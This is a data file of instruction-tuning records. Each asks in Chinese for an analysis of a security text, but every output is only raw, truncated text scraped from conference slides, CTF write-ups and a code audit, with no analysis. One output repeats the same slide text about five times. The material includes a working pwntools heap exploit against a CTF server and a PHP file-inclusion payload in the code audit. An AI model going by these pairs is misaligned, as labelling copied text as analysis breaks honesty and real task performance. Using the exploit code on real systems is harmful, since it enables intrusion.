{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWhat youll learn  What are the origins of this exploit.  What are the differences between executable and Static images?  How to create images with PHP & GD  How to fool servers into executing images (instead of serving them to browsers)  How to do cool things with images on Web 2.0 websites The Executable Image Exploit DEFCON XV Las Vegas Nevada mike@schrenk.com The Executable Image Exploit www.schrenk.com What youll learn  What are the origins of this exploit.  What are the differences between executable and Static images?  How to create images with PHP & GD  How to fool servers into executing images (instead of serving them to browsers)  How to do cool things with images on Web 2.0 websites The Executable Image Exploit DEFCON XV Las Vegas Nevada mike@schrenk.com The Executable Image Exploit www.schrenk.com What youll learn  What are the origins of this exploit.  What are the differences between executable and Static images?  How to create images with PHP & GD  How to fool servers into executing images (instead of serving them to browsers)  How to do cool things with images on Web 2.0 websites The Executable Image Exploit DEFCON XV Las Vegas Nevada mike@schrenk.com The Executable Image Exploit www.schrenk.com What youll learn  What are the origins of this exploit.  What are the differences between executable and Static images?  How to create images with PHP & GD  How to fool servers into executing images (instead of serving them to browsers)  How to do cool things with images on Web 2.0 websites The Executable Image Exploit DEFCON XV Las Vegas Nevada mike@schrenk.com The Executable Image Exploit www.schrenk.com What youll learn  What are the origins of this exploit.  What are the differences between executable and Static images?  How to create images with PHP & GD  How to fool servers into executing images (instead of serving them to browsers)  How to do cool things with images on Web 2.0 websites The Executable Image Exploit DEFCON XV Las Vegas Nevada mike@schrenk", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n服务器可信与硬件安全实践 目录 0 1  启动安全威胁  政策与行业  腾讯实践探索 启动安全威胁 0 1 服务器系统构成 启动安全威胁 0 1 启动链威胁 BMC BOOT &BMC&OS BOOT &BMC NIC &write SPI&flash PCH BOOT &ME&&&NIC BOOT UEFI BOOT Firmware Update OS BOOT SMM Handler &write SPI&flash Opt1Roms 3rd1NIC GPU FPGA,etc MotherBoard SPI&Flash AC&Power&On BMC SPI&Flash RAM RAM 红色已知在野案例 橙色实验案例 启动安全威胁 0 1 案例  Apt28-Lojax首个针对UEFI BIOS的持久化攻击  NSA针对戴尔惠普服务器的BIOS后门泄密  CIA针对苹果计算机的BIOS间谍工具泄密 威胁来源  安全漏洞  物理接触邪恶女仆  供应链 更隐蔽更顽固 目录 0 1  启动安全威胁  政策与行业  腾讯实践探索 等保2.0要求 0 1 第一级安全要求 分类要求 可信验证要求内容 安全通信网络|边界 区域|计算环境 可基于可信根对通信|边界|计算设备的系统引导程序系统程序等进行 可信验证并在检测到其可信性受到破坏后进行报警 等保2.0要求 0 1 二三四级要求 分类要求 可信验证要求内容 第二级  可信验证对象增加重要配置参数和应用程序  验证结果形成审计记录送至安全中心 第三级 在应用程序的关键执行环节进行动态可信验证 第四级  在应用程序的所有执行环节进行动态可信验证  进行动态关联感知 业界回顾 0 1  谷歌专用芯片titan固件校验与通信网关  亚马逊云智能网卡nitro固件校验与更新主机对固件只读  微软层级化可信根Cerberus类似谷歌  华为自研BMC  浪潮自研BMC + 国产可信模块  EDR行业增加PC端查杀能力 目录 0 1  启动安全威胁  政策与行业  腾讯实践探索 腾讯探索实践 0 1 UEFI启动过程 腾讯探索实践 0 1 防护链展示 腾讯探索实践 0 1 洋葱运行时监控 BIOS镜像校验  周期导出BIOS镜像  拆分UEFI文件系统  对比厂商原始BIOS镜像 硬件配置基线校验  主板BIOS写保护状态  BootGuard  Secure Boot 腾讯探索实践 0 1 APT28 攻击仿真 腾讯探索实践 0 1 UEFI原生能力 Secure Boot  支持证书/HASH黑白名单  验证板卡驱动与BootLoader  通过OEM侧注入腾讯自主证书链  定制告警能力 腾讯探索实践 0 1 Secure Boot 改造效果 腾讯探索实践 0 1 UEFI启动前验证-BootGuard  基于证书 + 验证签名合法性  验证范围是UEFI镜像中的SEC卷与 PEI卷  DXE卷由供应商自由发挥  黑屏阻断需定制告警能力 腾讯探索实践 0 1 落地部署 腾讯探索实践 0 1 遇到的坑  上游供应商成熟度  软硬结合兼容性  主板BIOS BUG  内核内存调度 BUG  供应链-维保体系改造 M A N O E U V R E 感谢观看 KCon 汇聚黑客的智慧", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n*CTF WriteUp By Nu1L Author: Nu1L *CTF WriteUp By Nu1L Pwn examination BabyNote Ping Reverse Simple File System NaCL Jump Misc Alice's warm up Today BabyFL Alice's challenge checkin Web oh-my-grafana oh-my-notepro oh-my-lotto oh-my-lotto-revenge Crypto ezRSA InverseProblem2 Pwn examination from pwn import * r = lambda x: p.recvuntil(x,drop=True) s = lambda x,y: p.sendafter(x,y) sl = lambda x,y: p.sendlineafter(x,y) context.log_level = 'debug' context.arch = 'amd64' HOST,PORT = \"124.70.130.92\", 60001 p = remote(HOST, PORT) # p = process('./examination') def choset(): sl(': ', str(0)) def choses(): sl(': ', str(1)) # teacher def add(number): sl('>> ', str(1)) sl(': ', str(number)) def score(): sl('>> ', str(2)) def newReview(idx,sz,comment): sl('>> ', str(3)) sl('> ', str(idx)) sl(': ', str(sz)) s(':', comment) def editReview(idx,comment): sl('>> ', str(3)) sl('> ', str(idx)) s(':', comment) def call(idx): sl('>> ', str(4)) sl('?\\n', str(idx)) def changeR(idx): sl('>> ', str(5)) sl(': ', str(idx)) def magic0(cnt): sl('>> ', str(6)) p.send(cnt) # student def do(): sl('>> ', str(1)) def check(): sl('>> ', str(2)) def pray(): sl('>> ', str(3)) def sset(): sl('>> ', str(4)) def changeI(idx): sl('>> ', str(6)) sl(': ', str(idx)) choset() add(0x1) # 0 add(0x1) # 1 add(0x1) # 2 add(0x1) # 3 add(0x1) # 4 add(0x1) # 5 newReview(0,0x68,'/bin/sh'.ljust(0x63,'\\x00')) newReview(1,0x68,'1'*0x68) newReview(2,0x3f8,'2'*0x3f8) add(0x1) # 6 newReview(4,0x68,'4'*0x68) newReview(6,0x68,'6'*0x68) changeR(1) changeI(0) pray() changeR(0) score() changeR(1) check() r('reward! ') heap = int(r('\\n'),16)-0x2a0 log.info(\"@ heap: \"+hex(heap)) sl('addr: ', str((heap+0x330)*10)) # fuckoff changeR(0) editReview(1,'1'*0x68+p8(0xc1)) # off-by-one call(2) # leak libc newReview(3,0x3f8,'3'*0x3f8) payload = p64(heap+0x990)+4*p64(0)+p64(0x21)+p64(0x500000001) payload += p64(heap+0x9b0)+p64(0x8) newReview(5,0x48,payload) changeR(1) changeI(6) check() pause() r('review:\\n') libc = u64(p.recv(8))-0x1ecbe0 lo", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## HD44780 (embedded, 150p, 40 solves) > The logic states of the GPIOs have been recorded Figure out the displayed message. You're gonna need this [here](./hd44780.tgz) ![1.jpg](1.jpg) ### PL [ENG](#eng-version) Dostajemy paczkę z sześcioma zdjęciami i sześcioma plikami, które zostały nazwane RSPI_GPIO_23.txt. Na zdjęciach widzimy 4 wierszowy wyświetlacz podłączony do raspberry pi. Po nazwie zadania możemy wywnioskować, że jest to wyświetlacz oparty o sterownik Hitachi HD44780. Pliki tekstowe zawierają dwie linijki danych pierwsza to czas, druga stan lini. Ze zdjęć widać, że wyświetlacz i raspberry podłaczone są w następujący sposób: ``` GPIO07 -> RS GPIO08 -> CLK GPIO25 -> BIT4 GPIO24 -> BIT5 GPIO23 -> BIT6 GPIO18 -> BIT7 ``` Haczykiem w tym zadaniu okazuje się to że wyświetlacz jest czterowierszowy co zmienia mapowanie pamieci na piksele na wyświetlaczu. Poprawne mapowanie wygląda w ten sposób. ![http://forum.allaboutcircuits.com/data/photos/o/1/1380-1335426137-a68c5c9f44d7bbcfc514a0e33c4c9cc6.png](http://forum.allaboutcircuits.com/data/photos/o/1/1380-1335426137-a68c5c9f44d7bbcfc514a0e33c4c9cc6.png) Potem wczytujemy dane plikiem [read.py](./read.py) i sortujemy je pod względem czasu. W wikipedii czytamy, że sygnał zegarowy \"łapie\" na opadającym zboczu. Emulujemy stany lini i zapisujemy je jeśli stan lini CLK zmienia się z 1 na 0. Następnie na [wyjściu](./read.out) wygenerowanym przez [read.py](./read.py) odpalamy [decode.py](./decode.py). Wyświetlacz podłączony jest czterobitowym interfejsem, dlatego musimy poskładać dwa stany na pojedynczą komendę. [Otrzymujemy](./decode.out) pięknie rozpisane to co dzieje się z wyświetlaczem. Możemy to zaemulować plikiem [emulate.py](./emulate.py). Na [wyjściu](./emulate.out) dostajemy ciąg ekranów. Ostatecznie flaga ukazana jest na ekranie: ``` ###################### #EOM # #The flag 32C3_Never_# #_let_you_down_Never_# #_gonna_give_you_up_ # ###################### ``` a flaga to: `32C3_Never__let_you_down_Never__gonna_give_you", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n代码审计 代码审计(一 一) 熊海 熊海cms V1.0 最近在学习代码审计试着将这些东西记录下来也是当做一种总结吧今天我进行这款cms的代码审计叫熊海cms V1.0它是一款小型的网站内容管 理系统非常适合个人建站使用因为年代久远了所以这款cms漏洞还是比较多的审计起来难度不难非常适合我这种小菜鸡入门学习的话不多 说我们先来看看它的源代码目录分布吧 admin//管理员后台 css//css样式 files//功能函数 images//图片文件 inc//配置信息 install//安装目录文件 seacmseditor//seacms编辑器 template//模板文件 upload//文件上传 index.php//网站入口 phpinfo.php//显示PHP的当前信息 使用说明.txt//使用说明 现在我们就大概清楚了它的目录信息对它的目录结构有了大体掌握现在我们就开始进行代码审计吧这个cms靶场漏洞网上能找出一堆writeup 所以我打算讲解一些不一样的东西重分析轻演示这里我主要介绍代码审计思路不会对每处漏洞都一一讲解有兴趣的小伙伴就可以下载下来 细细审计 代码审计常见方法 代码审计常见方法 1通读全文代码 2定向功能审计 3敏感函数回溯 1通读全文代码 通读全文代码 首先我们打开熊海cms中的index.php文件: <?php //单一入口模式 error_reporting(0); //关闭错误显示 $file=addslashes($_GET['r']); //接收文件名 $action=$file==''?'index':$file; //判断为空或者等于index include('files/'.$action.'.php'); //载入相应文件 ?> 在这里我们可以得知它是先接收一个r参数然后用addslashes函数进行过滤然后再跳转到r.php文件变成files/$file.php如果为空的话则包含 files/index.php这样的话我们在这里就很清楚的知道这里就是一个很经典的包含漏洞r参数只是经过了addslashes函数进行过滤(几乎相当于没 过滤)后被incluede包含同时因为在当前目录下有就存在phpinfo文件我们可以直接在url输入?r=../phpinfo可以发现程序产生了文件包含漏洞 http://127.0.0.1:9999/?r=../phpinfo 然后我们根据它的正确思路接着我们应该是跳转到file目录下的index.php文件 <?php require 'inc/301.php'; require 'inc/conn.php'; require 'inc/time.class.php'; $query = \"SELECT * FROM settings\"; $resul = mysql_query($query) or die('SQL语句有误'.mysql_error()); $info = mysql_fetch_array($resul); ?> <!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\"> <html xmlns=\"http://www.w3.org/1999/xhtml\"> <head> <meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" /> <title><?php echo $info['title']?></title> <meta name=\"keywords\" content=\"<?php echo $info['keywords']?>\" /> <meta name=\"description\" content=\"<?php echo $info['description']?>\" /> <meta name=\"version\" content=\"seacms V1.0.0310\" /> <?php require 'template/header.php';?> <div class=\"barn\"> <div id=\"body\"> <div id=\"imgtext\"> <strong>Oh,Perfect</strong> <span>个人免费开源程序倡导者</span> </div> <img src=\"images/banner.jpg\"> </div></div> <div id=\"body\"> <div class=\"div1\"> <div class=\"", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nYour Peripheral Has Planted Malware An Exploit of NXP SOCs Vulnerability Yuwei ZHENG, Shaokun CAO, Yunding JIAN, Mingchuang QIN UnicornTeam, 360 Technology Defcon 26 About us  360 Technology is a leading Internet security company in China. Our core products are anti-virus security software for PC and cellphones.  UnicornTeam (https://unicorn.360.com/) was built in 2014. This is a group that focuses on the security issues in many kinds of wireless telecommunication systems.  Highlighted works of UnicornTeam include:  Low-cost GPS spoofing research (DEFCON 23)  LTE redirection attack (DEFCON 24)  Attack on power line communication (Black Hat USA 2016) Agenda  Motivation  About Secure Boot  Different implementations of secure boot  Secure boot and Anti-clone  Details of the vulnerability  Exploitation  Countermeasures Motivation  Research the Secure Boot implementations in cost- constrained systems.  Assess the anti-cloning strength of embedded SoCs.  Try to find a common way to inject malware into peripheral. About Secure Boot  Public key-based binary signing and verification used by Secure Boot  Signing 1) Signer generate a key pair, K-priv and K-pub(Certificate). 2) Calculate the binary images hash. 3) Encrypt the hash with K-priv, the output is Signature. 4) Attach the Certificate(K-pub) and Signature to binary image.  Verification 1) Calculate the binary images hash 2) Decrypt the Signature with K-pub (certificate), the output is the original Hash. 3) If the two hashes are equal, the Signature is valid, which means binary hasnt been modified illegally. About Secure Boot  The primary boot loader(PBL) verify and load secondary boot loader(SBL)  The SBL verify and loader OS kernel.  The OS verify and load drivers and applications. Signature App PuK Application Signature Kernel PuK Kernel Root PuK in OTP area Signature SBL PBL in Boot Rom External Nand or Emmc What can Secure Boot be used for?  Prevent firmware from being infected or added with evil features. Two atta", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#include <cstdio> #include <cstdint> #include <cstdlib> #include <cstring> char bufkey_str[1000] = \"I'm a big fan of septyem46c7eb3f858c137f9bdffa5e0f880e8959bb2e65\"; int* bufkey = (int*) bufkey_str; unsigned int all_v5[] = { 0x363DDF8A, 0x0E3707311, 0x0E879FDD, 0x24BEA3C7, 0x9B7E408B, 0x3074528A, 0x0C6445404, 0x0A35E8A61, 0x99B3FD42, 0x4DF979E2, 0x1F8C4B0E, 0x1447FFFA, 0x8B99BBFD, 0x0AF5F33D7, 0x2F51FB8C, 0x0ADC702EB, 0x0B5A5319C, 0x33984815, 0x41535A36, 0x0E657EB0B, 0x0A4B199FF, 0x0D1C6CD38, 0x0BF583A5E, 0x930ABA46, 0x0D72C79D9, 0x6BFEFE79, 0x0C078D7C2, 0x4E7543D1, 0x4CD7A6F5, 0x86E471D0, 0x0A3AF0F50, 0x5347B2A8, 0x32C531A5, 0x6917DC30, 0x47BB052F, 0x0CBF37B13, 0x0D78FCCAA, 0x0B69B15D6, 0x13CE1C8E, 0x38FEA0C8, 0x4B0F668A, 0x680AFFA0, 0x6F6DCF36, 0x4D5B77E0, 0x0AE297FA2, 0x0F059DF29, 0x4C598EFB, 0x0E006177F, 0x60F2E72D, 0x9060FA96, 0x7B264647, 0x69982847, 0x0B2722356, 0x586C7009, 0x0A2208796, 0x1DB31180, 0x0F6CBF07E, 0x8FE301BC, }; uint64_t round(uint64_t in, int n) { uint32_t v4 = in; uint32_t v6 = in >> 32; uint32_t v5a = all_v5[n * 2]; uint32_t v5b = all_v5[n * 2 + 1]; v6 += ((v5a + bufkey[v4 & 0xf])  (v4 + ((v4 >> 5)  (16 * v4)))); v4 += ((v5b + bufkey[v6 & 0xF])  (v6 + ((v6 >> 5)  (16 * v6)))); uint64_t fin = ((uint64_t) v6 << 32) | v4; return fin; } uint64_t invround(uint64_t out, int n) { uint32_t v4 = out; uint32_t v6 = out >> 32; uint32_t v5a = all_v5[n * 2]; uint32_t v5b = all_v5[n * 2 + 1]; v4 -= ((v5b + bufkey[v6 & 0xF])  (v6 + ((v6 >> 5)  (16 * v6)))); v6 -= ((v5a + bufkey[v4 & 0xf])  (v4 + ((v4 >> 5)  (16 * v4)))); uint64_t fin = ((uint64_t) v6 << 32) | v4; return fin; } uint64_t dec(uint64_t state) { state = (state << 32) | (state >> 32); for (int j = 28; j >= 0; j--) { state = invround(state, j); } return state; } char buf[1000]; uint64_t xor1[] = { 0x4FFCD296B19AFA37, 0x0C912086E763430B7, 0x9B2B79EE86ABC820, 0x0A05322E3934CC3EA, 0x0A05322E3934CC3EA, 0x0A05322E3934CC3EA, 0x4AA443CAD9CBE242, }; uint64_t xor2[] = { 0x801135AA0BF7AC52LL, 0x8C2842785341", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSecurity Assurance Basics: Offensive Security Assurance Penetration Testing 101 (mRr3b00ts Notebook draft edition 0.3) Author: Daniel Card Penetration Testing PUBLIC  Version 0.3 Copyright Xservus Limited Page 2 Contents Copyright ............................................................................................................................................... 10 Document Control................................................................................................................................. 10 Version .............................................................................................................................................. 10 A glimpse at mRr3b00ts world ............................................................................................................. 11 Introduction .......................................................................................................................................... 12 Disclaimer.............................................................................................................................................. 12 Realities of System Security Assurance Activities ................................................................................. 13 Sales ...................................................................................................................................................... 14 Scoping .................................................................................................................................................. 14 Test Focus ......................................................................................................................................... 14 Test Types ......................................................................................................................................... 14 Test Scope Definition .......................................................................................", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMammas Dont Let Your Babies Grow Up to Be Pen Testers: Everything Your Guidance Counselor Forgot To Tell You About Pen TesEng Who are we?  2 dudes by a trash can  Dr. Patrick Engebretson  Network Sec wonk  Dr. Josh Pauli  Web Sec wonk  So you want to be a pen tester? Issue 1: Your expectaEons Hacking like the movies!!!!  Chicks dig hackers  MS Windows rulz  GUI > command line  Become a PT, earn millions. Issue 2: Reality.  Most chicks dont really care if youre leet.  Linux rulz.  Command line > GUI  There is no money tree Issue 3: Budgets  What does a budget have to do with a Pen Test?  You can have anything you wantas long as its free Issue 4: The PT authorizaEon form should NOT give away the farm.  This job is like fighEng Mike Tyson* with a pillow  What do you mean were going to tell them were coming? * Tyson circa 1988 Issue 5: InformaEon Gathering is important.  Yes we encourage you to do informaEon gatheringit just has to be done in 10 minutes or less. Issue 6: You must follow the rules of engagement  What does scope have to do with anything?  a.k.a. you mean to tell me that that box is ripe with exploits and can give me root access to my target but Im not allowed to afack it? Issue 7: Fat fingers  The dangers of having chubby lifle hands Circus folk. Nomads, you know. Small hands. Smell like cabbage. ~ AusEn Powers Issue 8: UnrealisEc deadlines  You mean Im supposed to perform a Pen Test on 2,000 ips in 16 hours? Issue 9: UnrealisEc client expectaEons  The sales men told you WHAT?  you know its not REALLY possible to thoroughly scan 200 URLs in the next 20 minutes right? Issue 10: Relying on other peoples work  Using un-audited exploits  What do you mean I gave away shells? Issue 11: Relying on YOUR OWN work  What do you mean I got our IP banned from Whois? Issue 12: Keeping your data secure  What do you mean you sold the old PT machines on eBay??? Issue 13: When your success means someone else failed.  What do you mean the Sys Admin is mad at me for embarrassi", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nStephen Hilt, miaoski 2015/8/26-27 Building Automation and Control  Hacking Subsidized Energy Saving System 1 $ whoami  miaoski (@miaoski)  Staff engineer in Trend Micro  BACnet newbie 2 $ whoami  Stephen Hilt (@tothehilt)  Senior threat researcher, Trend Micro  10 years ICS security exp 3 Disclaimer  Do not probe / scan / modify the devices that you dont own.  Do not change any value without permission.  Its a matter of LIFE AND DEATH.  Beware! Taiwanese CRIMINAL LAW. 4 Photo courtesy of Wikimedia, CC0. BACnet  Building Automation and Control networks 5 BACnet was designed to allow communication of building automation and control systems for applications such as heating, ventilating, and air-conditioning control, lighting control, access control, and fire detection systems and their associated equipment. http://en.wikipedia.org/wiki/BACnet Building Automation? 6 Image from http://buildipedia.com/aec-pros/facilities-ops-maintenance/case-study- cuyahoga-metro-housing-authority-utilizes-bas Credit: Siemens Building Technologies Building Automation! 7 Photo courtesy of Chien Kuo Senior High School. ANSI/ASHRAE 135-2001 8 ICS Protocols 9  ICS  Industrial Control Systems  SCADA  Supervisory Control and Data Acquisition  DCS  Distributed Control Systems (Most) ICS Protocols 10 Authentication Encryption Data Integrity Homemade BACnet 11 http://bacnet.sourceforge.net/ BACnet Layers map to OSI 12 Credit: icpdas.com BACnet/IP 13 BACnet/IP = UDP + BVLL + NPDU + APDU +  14 Charts courtesy of http://www.bacnet.org/Tutorial/BACnetIP/default.html BACnet/IP = UDP + BVLL + NPDU + APDU +  15 Charts courtesy of http://www.bacnet.org/Tutorial/BACnetIP/default.html BBMD = BACnet broadcast management device BACnet Objects 16 Credit: www.bacnet.org BACnet-discover-enumerate.nse (1) 17 Object Name Packet Sent == 810a001101040005010c0c023FFFFF194d  77 == 0x4d Source: ANSI/ASHRAE Standard 135-2001 Source code: https://github.com/digitalbond/Redpoint/blob/master/BACnet-discover-enumerate.nse ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nD.I.Y. NUKEPROOFING A NEW DIG AT DATA-MINING D.I.Y. NUKEPROOFING A NEW DIG AT DATA-MINING @3ALARMLAMPSCOOT DEFCON 24 @3ALARMLAMPSCOOT DEFCON 24 BACKGROUND (RADIATION?) (why?) didn't we do this last year? BACKGROUND (RADIATION?) (why?) didn't we do this last year? @3ALARMLAMPSCOOT D.I.Y. NUKEPROOFING @3ALARMLAMPSCOOT D.I.Y. NUKEPROOFING -A lot of F.U.D. about current and future nuclear threats -Civilian rad-hardening an ongoing Achilles' heel, lack of cogent preparedness especially against EMP -Ordering Tritium from Thailand is bad, mkay? -A lot of F.U.D. about current and future nuclear threats -Civilian rad-hardening an ongoing Achilles' heel, lack of cogent preparedness especially against EMP -Ordering Tritium from Thailand is bad, mkay? SOME PHYSICS HISTORY RELEVANT TO PROLIFERATION SOME PHYSICS HISTORY RELEVANT TO PROLIFERATION @3ALARMLAMPSCOOT D.I.Y. NUKEPROOFING @3ALARMLAMPSCOOT D.I.Y. NUKEPROOFING -Neutrons, discovered in 1930, are responsible for isotopes of elements with differing mass -Fissile isotopes split when bombarded by neutrons; U-235, Pu-239 are important regarding proliferation -A critical mass can sustain a reaction, critical assembly makes a very dense softball into a physics package(euphemism!) -Neutrons, discovered in 1930, are responsible for isotopes of elements with differing mass -Fissile isotopes split when bombarded by neutrons; U-235, Pu-239 are important regarding proliferation -A critical mass can sustain a reaction, critical assembly makes a very dense softball into a physics package(euphemism!) THE MANHATTAN PROJECT THE $26B* O.G. O.G. OF PROLIFERATION THE MANHATTAN PROJECT THE $26B* O.G. O.G. OF PROLIFERATION @3ALARMLAMPSCOOT D.I.Y. NUKEPROOFING @3ALARMLAMPSCOOT D.I.Y. NUKEPROOFING -Little Boy: ~80% uranium-235 (HEU) gun-typedevice; gaseous diffusion and calutron enrichment. 13-18kt yield -Little Boy: ~80% uranium-235 (HEU) gun-typedevice; gaseous diffusion and calutron enrichment. 13-18kt yield Fat Man: 96% Pu-239 (WG Pu) implosio", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nhttp://gtvhacker.com/pres/dc20.ppt Hacking The Google TV GTVHacker Presented by: Amir zenofex Etemadieh, CJ cj_000 Heres, Tom tdweng Dwenger, and Dan bliss Rosenberg http://gtvhacker.com/pres/dc20.ppt GTVHacker: The Team GTVHacker  GTVHacker is a group of 6 hackers with individual skill sets who work together to unlock Google TV devices.  Our primary goal is to bypass hardware and software restrictions to allow for unsigned kernels to be loaded and used.  To date the team has released multiple methods for unlocking Google TV devices.  GTVHacker team won $500 bounty for being the first to root the Google TV. http://gtvhacker.com/pres/dc20.ppt Team Members GTVHacker The GTVHacker team officially consists of 6 members:  AgentHH  First human outfitted with metal legs.  cj_000 - Destroyer of words  Gynophage  German rockstar reverse engineer  [mbm] - known for founding the Open-WRT project and tossing 251 children down a well  Tdweng  software developer turned super hero.  Zenofex           With special guest:  Bliss - a vulnerability researcher who takes sick pleasure in exploiting anything with a CPU. He once punched an Android in the face. http://gtvhacker.com/pres/dc20.ppt Google TV: What is it?  Google TV is a platform that bridges the gap between your TV and an Android device.  Platform creates an overlay on television stream and also contains an IR transmitter to transmit to media center devices (cable box, TV, sound system).  Device was originally released without the Android Market available but was eventually updated to include it.  Platform receives Over-the-Air updates automatically from OEM manufacturer.  Platform contains forked version of Chrome with all plug-ins and extensions other than Flash disabled. GTVHacker http://gtvhacker.com/pres/dc20.ppt Android vs. Google TV Although Google TV runs Android there are differences:  The device has a Chrome browser out of the box which provides a fairly reliable and safe browsing experience  The Gen 1 Google TV pla", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTag-side attacks against NFC What is NFC? Contactless communication between two devices in close proximity Many uses, primarily door controls and payment systems Why attack NFC? Interesting technology Low-level analysis tools can be prohibitively expensive Known to be insecure, but still widely used ISO-14443 Focuses on 13.56MHz NFC communication Defines the characteristics of the communication performed between tags and readers Two tag types based on it, A and B ISO-14443A is the most commonly used of the standards Low-level communication  ISO14443A Tags are powered by electromagnetic induction Communication is sent by the reader by disabling the field at specific intervals The reader uses the Modified Miller coding scheme for transmitting data to the tag Responses are sent by the tag by modifying the power being drawn from the reader Tags use the Manchester coding scheme to modulate the load Each communicated byte has an additional parity bit Modified Miller Disables field a defined intervals Minimises power loss Defined as follows:  0 bit after 0 bit: low for the first quarter of the transmission, followed by high for the remainder of the transmission  0 bit after 1 bit: high for the entire transmission  1 bit: high for the first half of the transmission, followed by low for one quarter of the transmission, and high for the remainder of the transmission 0 0 1 1 0 0 1 0 0 Manchester Performed by modifying the phase of the signal In NFC is communicated by modifying the load being drawn by the tag, using a subcarrier 1 0 0 1 0 Basic Enumeration Anticollision Performed when two tags are communicating with a reader Involves requesting responses based on partial UIDs Increases the number of bits requested until a single UID is identified Once communication is complete, the next tag can be identified and communicated with Encryption and Authentication  Mifare Ultralight An authentication key is sent to the tag If the key is accurate, the reader has authenticated with th", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# advanced-potion-making Forensics, 100 points ## Description > Ron just found his own copy of advanced potion making, but its been corrupted by some kind of spell. Help him recover it! A binary file was attached. ## Solution Let's check the file type: ```console (user@kali)-[/media/sf_CTFs/pico/advanced-potion-making] $ file advanced-potion-making advanced-potion-making: data ``` `file` doesn't recognize it. Let's peek inside: ```console (user@kali)-[/media/sf_CTFs/pico/advanced-potion-making] $ xxd -g 1 ./advanced-potion-making| head 00000000: 89 50 42 11 0d 0a 1a 0a 00 12 13 14 49 48 44 52 .PB.........IHDR 00000010: 00 00 09 90 00 00 04 d8 08 02 00 00 00 04 2d e7 ..............-. 00000020: 78 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 x....sRGB....... 00000030: 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 ..gAMA......a... 00000040: 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 ..pHYs...%...%.I 00000050: 52 24 f0 00 00 76 39 49 44 41 54 78 5e ec fd 61 R$...v9IDATx..a 00000060: 72 e3 4c 94 a6 59 ce 16 6a fe 76 cd fe 57 d7 dd r.L..Y..j.v..W.. 00000070: 5b 18 45 e9 4b 8a 7a 28 d1 9d 20 48 07 a9 63 76 [.E.K.z(.. H..cv 00000080: ac 2d 2b 3e bf af 5f 07 18 01 82 d7 b2 f3 ff f3 .-+>.._......... 00000090: ff fc 7f ff 7f 00 00 00 00 00 00 00 4b 18 58 02 ............K.X. ``` This looks like a PNG header due to the existence of `IHDR`, but doesn't start with the expected magic bytes. Let's fix it based on the spec and see what we get: ```console (user@kali)-[/media/sf_CTFs/pico/advanced-potion-making] $ xxd -g 1 advanced-potion-making-test.png | head 00000000: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 .PNG........IHDR 00000010: 00 00 09 90 00 00 04 d8 08 02 00 00 00 04 2d e7 ..............-. 00000020: 78 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 x....sRGB....... 00000030: 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 ..gAMA......a... 00000040: 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 ..pHYs...%...%.I 00000050: 52 24 f0 00 00 76 39 49 44 41 54 78 5e e", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSaving Cyberspace by Reinventing File Sharing Eijah v1.02 The Modern Internet The Price of Convenience One can easily remain free of even the most intense political oppression simply by placing ones faith and trust in institutions of authority.  Glenn Greenwald When I am afraid, I put my trust in you.  Psalm 56:3 3 A State of Trust  Technological Innovation  Open source  Web and data standards  Shared protocols  Interoperability  Benefits  Cost effective applications  Faster time-to-market  Cross-domain content  Convenience 4 ? Trust Convenience Control Change A State of Convenience  Benefits  Improved application usability  Google/FB login  Everything at our fingertips  Multiple devices linked to accounts  Simplification  Ease of cross-domain navigation  Concerns  Privacy  Anonymity  Potential for abuse  Loss of control 5 ? Trust Convenience Control Change A State of Control  Questions  Who owns our data?  Are we simply a source?  Are we greater than the sum?  Loss of Control  Data retention and oversight  Legal compliance  Security breaches  Overall transparency  The bottom line 6 ? Trust Convenience Control Change A State of Change  The Truth  Convenience doesnt require trust  No need to give up control  The power to change the world  The Path Forward  Become advocates for distrust  Break the mold of old and stale thinking  Create something secure and beautiful  Open up the Internet for Digital Self Expression 7 ? Trust Convenience Control Change A Brief History From FTP to µTorrent The increase of disorder or entropy is what distinguishes the past from the future, giving a direction to time.  Stephen Hawking, A Brief History of Time Information is power. But like all power, there are those who want to keep it for themselves.  Aaron Swartz 8 Centralized Model  Client-Server  S/FTP  Usenet  IRC  File Systems  NTFS  Samba  NFS  Web-Based  MediaFire  Mega(upload)  RapidShare  Streaming  Netflix  Amazon Prime  HBO Go  Revision 3  Crackle  Hulu (+)  